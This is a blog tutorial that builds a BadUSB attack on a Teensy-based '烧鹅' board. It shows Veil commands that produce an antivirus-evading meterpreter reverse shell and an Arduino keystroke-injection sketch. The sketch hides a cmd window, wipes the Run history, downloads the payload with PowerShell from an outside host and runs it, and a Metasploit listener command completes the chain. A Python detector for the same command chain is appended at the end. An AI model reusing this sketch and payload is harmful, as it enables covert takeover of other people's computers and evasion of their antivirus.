Building a simple BadUSB with the 烧鹅 board: whoever you plug it into "gets pregnant"

The hardware used is the 烧鹅 (Shao'e), a USB Rubber Ducky-style development board that RadioWar designed around the Teensy++ 2.0 AT90USB1286 chip.

Use veil to encode a meterpreter payload (an encoded payload only survives a few minutes against anti-virus) and host it on a server. Plug in the 烧鹅; it emulates keyboard input, downloads the payload from cmd and runs it.

0x1 Making an AV-evading meterpreter with veil encoding

root@kali:~# veil-evasion //start veil

[>] Please enter a command: list //show the list of available payloads

26) python/meterpreter/rev_tcp

[>] Please enter a command: 26 //select payload number 26 here

[>] Please enter a command: set LHOST 192.168.31.233 //set LHOST

[>] Please enter a command: generate //encode the payload

[*] Press [enter] for 'payload'

[>] Please enter the base name for output files: a //enter a name for the generated payload

[>] Please enter the number of your choice: 1 //choose the encoding method

[*] Executable written to: /root/veil-output/compiled/a1.exe //location of the encoded payload

0x2 Writing the execution code into the BadUSB

Write it with the Arduino IDE. The download uses PowerShell; if you use the vbs approach, 360 raises an alert.

 

[php]void setup() { // initialisation; the code here runs only once
    delay(5000); // delay so the OS has enough time to enumerate the 烧鹅, otherwise the later keystrokes get scrambled
    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // press the Win key
    Keyboard.set_key1(KEY_R); // press R at the same time
    Keyboard.send_now(); // send Win+R
    delay(100);
    Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
    // open a tiny CMD window with text and background colours as close as possible, to hide the typed input
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    delay(300);
    Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); // clear the Start > Run history via the registry
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.println("powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.100/a1.exe','D:\\1.exe')"); // download the remote payload
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(3000); // delay, wait for the download to finish
    Keyboard.println("d:\\1.exe"); // run the downloaded file
    Keyboard.set_key1(KEY_ENTER);
    delay(300);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.set_key1(KEY_SPACE);
    Keyboard.set_key2(KEY_C);
    Keyboard.send_now();
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.set_key2(0);
    Keyboard.send_now(); // close the cmd window (Alt+Space, C)
}

void loop() { // loop; the code here runs forever
}[/php]

 

0x3 Waiting for the target to connect

[php]msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //start listening and wait for the connection[/php]


Plug the USB into the target machine; the commands run and the target checks in to the handler.

PS: there are many other things you can do with this, such as enabling 3389 on the target, creating a new user, and so on.
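The command chain the sketch types (a minimised cmd window, deletion of the RunMRU key, a PowerShell WebClient download, then execution from the download path) is also what a defender can look for. The following is an added example written for this page, not code from the original post or from the 烧鹅 project: a small correlation detector that runs over constructed process-creation records shaped like Sysmon Event ID 1 fields (timestamp, parent image, image, command line; that shape and the sample records are assumptions). It flags the chain when two distinct indicators appear within one time window, or when a process image matches the local path a DownloadFile call wrote to shortly before.

```python
"""Added example (not from the original post): detect the BadUSB command chain
described above in constructed process-creation records."""
import re
from datetime import datetime, timedelta

# Indicator patterns taken from the command lines in the Arduino sketch above.
INDICATORS = {
    "tiny_cmd_window": re.compile(
        r"cmd(\.exe)?\s+/T:\w+\s+/K\s+mode\s+CON:?\s+COLS=\d+\s+LINES=\d+", re.I),
    "runmru_cleared": re.compile(r"reg(\.exe)?\s+delete\s+.*Explorer\\RunMRU", re.I),
    "webclient_download": re.compile(
        r"powershell.*new-?\s*object\s+System\.Net\.WebClient.*DownloadFile", re.I),
}
# Pulls (url, local path) out of a DownloadFile('url','path') call.
DOWNLOAD_ARGS = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)

# Constructed sample records (not real telemetry): timestamp, parent image, image, command line.
SAMPLE_EVENTS = [
    ("2015-06-01 10:00:00", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
     "cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"),
    ("2015-06-01 10:00:01", "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\reg.exe",
     "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"),
    ("2015-06-01 10:00:02", "C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.100/a1.exe','D:\\1.exe')"),
    ("2015-06-01 10:00:06", "C:\\Windows\\System32\\cmd.exe", "D:\\1.exe", "d:\\1.exe"),
    # Benign noise much later: an admin querying a Run key, which must not alert.
    ("2015-06-01 11:30:00", "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\reg.exe",
     "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
]


def match_indicators(cmdline):
    """Return the names of every indicator pattern that matches one command line."""
    return [name for name, pat in INDICATORS.items() if pat.search(cmdline)]


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def correlate(events, window_seconds=60):
    """Walk the records in time order and emit alerts for the chain.

    State (indicator hits and download target paths) is kept only for
    window_seconds, so an isolated reg.exe or powershell.exe run never alerts
    on its own. Returns a list of (timestamp, alert_name, detail) tuples.
    """
    window = timedelta(seconds=window_seconds)
    hits = []      # (timestamp, indicator name) inside the window
    dropped = {}   # lower-cased local path written by DownloadFile -> timestamp
    alerts = []
    for ts_text, _parent, image, cmdline in sorted(events, key=lambda e: parse_ts(e[0])):
        ts = parse_ts(ts_text)
        # Expire state that fell out of the window.
        hits = [(t, n) for t, n in hits if ts - t <= window]
        dropped = {p: t for p, t in dropped.items() if ts - t <= window}

        matched = match_indicators(cmdline)
        hits.extend((ts, name) for name in matched)
        m = DOWNLOAD_ARGS.search(cmdline)
        if m:
            dropped[m.group(2).lower()] = ts

        names = {n for _, n in hits}
        if image.lower() in dropped:
            # A file written by a recent WebClient download is now a running process.
            alerts.append((ts_text, "execution_of_downloaded_file", image))
        elif matched and len(names) >= 2:
            alerts.append((ts_text, "badusb_command_chain", ",".join(sorted(names))))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The patterns are keyed to the exact strings the sketch types; a real deployment would loosen them (other console-mode flags, other download cmdlets) and feed the detector from actual process-creation telemetry rather than the constructed list above.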

Author / Aex